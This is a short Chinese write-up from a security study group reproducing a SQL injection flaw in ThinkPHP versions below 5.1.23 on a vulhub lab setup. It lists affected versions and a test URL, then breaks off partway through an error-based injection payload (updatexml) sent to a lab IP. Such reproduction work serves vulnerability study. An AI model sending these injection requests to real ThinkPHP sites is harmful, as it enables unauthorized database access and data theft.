文章来源|MS08067 WEB攻防知识星球
本文作者:叫我啊(Ms08067实验室追洞小组成员)
漏洞复现分析 认准追洞小组
一、漏洞介绍
ThinkPHP是一个开源的,快速、简单的面向对象的轻量级PHP开发框架
二、影响版本
ThinkPHP < 5.1.23
三、漏洞复现
采用vulhub快速搭建
启动后,访问http://your-ip/index.php?ids[]=1&ids[]=2 ,即可看到用户名被显示了出来,说明环境运行成功。
http://192.168.47.130/index.php?ids[]=1&ids[0,updatexml(0,co